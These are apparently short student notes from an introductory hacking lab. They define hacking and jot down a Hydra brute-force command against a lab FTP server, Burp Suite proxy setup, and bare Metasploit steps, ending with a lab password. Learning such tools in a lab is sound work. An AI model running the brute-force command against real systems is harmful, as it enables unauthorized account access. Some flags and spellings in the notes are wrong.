What is Hacking?
Using software or systems in ways that they were not designed to be used.
- Overt use is the designed purpose
- Covert use is other than the designed use
Hydra = Brute force for
hydra -l user.txt -P passlist.txt 192.168.56.101 ftp
- try a list of users against the server
firefox in Kali, change network setting at bottom of preferences
Start Burp Suite, turn off interceptor under poxy
Start metasploite by typing msfconsole
set rhosts 192.168.56.101
run (or exploit)
the password is password